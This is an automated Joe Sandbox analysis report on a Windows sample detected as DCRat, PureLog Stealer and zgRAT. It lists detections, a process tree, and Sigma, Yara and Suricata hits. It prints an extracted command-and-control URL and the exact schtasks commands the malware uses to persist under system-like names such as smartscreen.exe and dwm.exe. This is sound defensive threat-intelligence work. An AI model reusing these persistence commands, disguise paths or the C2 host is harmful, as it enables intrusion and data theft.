Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EjS7Q5fFCE.exe

Overview

General Information

Sample name:EjS7Q5fFCE.exe
renamed because original name is a hash value
Original sample name:5fa3d2d795206f9981b7bd191c423d65.exe
Analysis ID:1581773
MD5:5fa3d2d795206f9981b7bd191c423d65
SHA1:e4fb0a0e2c1dc7c1bca06c791ad1ad05a67016ca
SHA256:0a9c437939c86beb90ce02ac853983c7daca5d801489b81f537d6c9b9c4796b3
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • EjS7Q5fFCE.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\EjS7Q5fFCE.exe" MD5: 5FA3D2D795206F9981B7BD191C423D65)
    • wscript.exe (PID: 7612 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Portsessionsvc.exe (PID: 8076 cmdline: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe" MD5: 5231D0FCCC4F24F5B3D76964B3513636)
          • schtasks.exe (PID: 8164 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7188 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dwm.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4488 cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4408 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1368 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1208 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1420 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7464 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 13 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3512 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ComproviderComponentIntocommon\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7584 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7568 cmdline: schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7304 cmdline: schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 332 cmdline: schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 1816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2516 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7764 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • ctfmon.exe (PID: 5980 cmdline: C:\ComproviderComponentIntocommon\ctfmon.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • ctfmon.exe (PID: 980 cmdline: C:\ComproviderComponentIntocommon\ctfmon.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • dwm.exe (PID: 1220 cmdline: C:\Recovery\dwm.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • dwm.exe (PID: 1780 cmdline: C:\Recovery\dwm.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • Portsessionsvc.exe (PID: 3412 cmdline: C:\ComproviderComponentIntocommon\Portsessionsvc.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • Portsessionsvc.exe (PID: 7864 cmdline: C:\ComproviderComponentIntocommon\Portsessionsvc.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • smartscreen.exe (PID: 2828 cmdline: C:\Windows\Resources\Themes\smartscreen.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • smartscreen.exe (PID: 1028 cmdline: C:\Windows\Resources\Themes\smartscreen.exe MD5: 5231D0FCCC4F24F5B3D76964B3513636)
    • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5936 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • smartscreen.exe (PID: 6348 cmdline: "C:\Windows\Resources\Themes\smartscreen.exe" MD5: 5231D0FCCC4F24F5B3D76964B3513636)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads", "MUTEX": "DCR_MUTEX-5T1XqD41gjMZTLBOC4hB"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
EjS7Q5fFCE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    EjS7Q5fFCE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\dwm.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              7.0.Portsessionsvc.exe.760000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                7.0.Portsessionsvc.exe.760000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.EjS7Q5fFCE.exe.69a6705.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 4 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetFilename: C:\Recovery\dwm.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\dwm.exe, CommandLine: C:\Recovery\dwm.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\dwm.exe, NewProcessName: C:\Recovery\dwm.exe, OriginalFileName: C:\Recovery\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\dwm.exe, ProcessId: 1220, ProcessName: dwm.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\Resources\Themes\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smartscreen
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\Resources\Themes\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", ProcessId: 7252, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\EjS7Q5fFCE.exe", ParentImage: C:\Users\user\Desktop\EjS7Q5fFCE.exe, ParentProcessId: 7568, ParentProcessName: EjS7Q5fFCE.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe" , ProcessId: 7612, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ProcessId: 8076, TargetFilename: C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline", ProcessId: 7252, ProcessName: csc.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Sigma detected: Schedule system process
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ComproviderComponentIntocommon/Portsessionsvc.exe", ParentImage: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, ParentProcessId: 8076, ParentProcessName: Portsessionsvc.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f, ProcessId: 8164, ProcessName: schtasks.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-28T23:47:51.521067+010020480951A Network Trojan was detected192.168.2.449736172.67.186.20080TCP
                                    2024-12-28T23:48:01.271035+010020480951A Network Trojan was detected192.168.2.449737172.67.186.20080TCP
                                    2024-12-28T23:48:06.317910+010020480951A Network Trojan was detected192.168.2.449739172.67.186.20080TCP
                                    2024-12-28T23:48:09.817923+010020480951A Network Trojan was detected192.168.2.449746172.67.186.20080TCP
                                    2024-12-28T23:48:13.771059+010020480951A Network Trojan was detected192.168.2.449757172.67.186.20080TCP
                                    2024-12-28T23:48:18.317923+010020480951A Network Trojan was detected192.168.2.449768172.67.186.20080TCP
                                    2024-12-28T23:48:21.474187+010020480951A Network Trojan was detected192.168.2.449773172.67.186.20080TCP
                                    2024-12-28T23:48:44.661706+010020480951A Network Trojan was detected192.168.2.449825172.67.186.20080TCP
                                    2024-12-28T23:48:53.021104+010020480951A Network Trojan was detected192.168.2.449845172.67.186.20080TCP
                                    2024-12-28T23:49:01.349232+010020480951A Network Trojan was detected192.168.2.449863172.67.186.20080TCP
                                    2024-12-28T23:49:10.364878+010020480951A Network Trojan was detected192.168.2.449883172.67.186.20080TCP
                                    2024-12-28T23:49:13.583634+010020480951A Network Trojan was detected192.168.2.449892172.67.186.20080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: EjS7Q5fFCE.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://001031cm.nyashteam.ru/Avira URL Cloud: Label: malware
                                    Source: http://001031cm.nyashteam.ruAvira URL Cloud: Label: malware
                                    Source: http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\jdisWpWAyY.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Recovery\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads", "MUTEX": "DCR_MUTEX-5T1XqD41gjMZTLBOC4hB"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeReversingLabs: Detection: 78%
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeReversingLabs: Detection: 78%
                                    Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeReversingLabs: Detection: 78%
                                    Source: C:\Recovery\dwm.exeReversingLabs: Detection: 78%
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeReversingLabs: Detection: 78%
                                    Source: C:\Users\user\Desktop\etRRuFlx.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kwWqKlvO.logReversingLabs: Detection: 25%
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeReversingLabs: Detection: 78%
                                    Multi AV Scanner detection for submitted file
                                    Source: EjS7Q5fFCE.exeReversingLabs: Detection: 62%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Recovery\dwm.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeJoe Sandbox ML: detected
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeJoe Sandbox ML: detected
                                    Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoe Sandbox ML: detected
                                    Source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJoe Sandbox ML: detected
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: EjS7Q5fFCE.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-5T1XqD41gjMZTLBOC4hB","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                    Source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://001031cm.nyashteam.ru/","pythonProcessdefaultWordpressdatalifetempcdnDownloads"]]
                                    Source: EjS7Q5fFCE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: EjS7Q5fFCE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: EjS7Q5fFCE.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.pdb source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: em.pdbB4 source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0042A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0042A69B
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeCode function: 0_2_0043C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0043C220
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile opened: C:\Users\userJump to behavior
